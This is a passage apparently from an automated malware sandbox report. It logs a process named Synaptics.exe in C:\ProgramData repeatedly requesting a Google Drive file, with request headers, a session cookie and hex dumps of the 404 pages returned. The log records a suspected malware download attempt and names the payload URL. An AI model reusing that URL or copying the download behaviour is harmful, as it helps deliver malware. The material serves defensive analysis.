                                                                                                                                      2024-12-30 10:23:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      116192.168.2.550004142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:38 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ydbs99JOBi9HAp8grEdALg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      117192.168.2.550005142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:38 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC71DCQxEQS7SNdpA_QILkY_Y6NFo1aSaOkftQc2uZD4y1Aql8ZFApcmAL77vpam4UVt
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-cq4LilOi5C6RsfnkmP7YQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 4e 62 47 31 6f 6c 56 4d 75 53 48 48 67 46 34 51 77 54 55 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="4NbG1olVMuSHHgF4QwTUYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      118192.168.2.550012142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-yUuDkk_pMRZhT2OvDNOgIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      119192.168.2.550018142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:39 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC46Xyi4K3LTMHVquq3p_69J4YIEE8OFKXCgU1Yj9uJTI_W3Ysyvo2FmVC-fVRCpjA8Z
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:40 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-abJbao0U5fB7b42vgHSKVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 72 68 48 6d 54 66 38 69 51 4e 64 33 67 4a 45 43 55 4c 4c 65 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="xrhHmTf8iQNd3gJECULLeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      120192.168.2.550019142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:40 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-M_wV3hyylcoQAG5127ZXsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      121192.168.2.550020142.250.186.33443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:39 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:40 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6Yt7hR5gDg96uPAF0VxbzEHgWbr3F5_MrMBHzUEJQiT7uKBaORQSZ0HWfYcwSrd1vPirjEbwk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:40 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wEtQwri4xkRI5Hkq2OL9uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:40 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:40 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 6e 37 43 4a 66 6e 5a 6c 6d 68 46 70 6b 65 78 34 47 62 48 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="ln7CJfnZlmhFpkex4GbHNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:40 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      122192.168.2.550026142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      123192.168.2.550027142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      124192.168.2.550028142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      125192.168.2.550031142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
